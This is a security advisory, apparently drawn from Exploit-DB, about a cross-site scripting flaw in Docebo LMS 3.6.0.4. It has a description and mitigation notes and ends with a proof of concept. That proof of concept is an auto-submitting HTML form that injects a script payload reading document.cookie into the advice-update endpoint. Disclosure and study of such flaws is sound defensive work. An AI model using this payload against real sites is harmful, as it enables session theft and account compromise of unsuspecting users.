Cross-Site Scripting in Docebo

vendor:

Docebo LMS

by:

Not mentioned

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: Docebo LMS

Affected Version From: 3.6.0.4

Affected Version To: Not mentioned

Patch Exists: NO

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Not mentioned

Not mentioned

Cross-Site Scripting in Docebo

Docebo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate this vulnerability, Docebo should implement proper input sanitization and validation to ensure that user-supplied input is properly handled and does not contain malicious code. Additionally, cookie-based authentication should be properly secured to prevent unauthorized access.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43721/info

Docebo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Docebo 3.6.0.4 is vulnerable; prior versions may also be affected.

<form action="http://www.example.com/doceboLms/index.php?modname=advice&op=upadvice" method="post" name="main" > <input type="hidden" name="idAdvice" value="2" /> <input type="hidden" name="title" value="Hello" /> <input type="hidden" name="description" value='1"><script>alert(document.cookie)</script>' /> <input type="hidden" name="addadvice" value="Save changes" /> </form> <script> document.main.submit(); </script>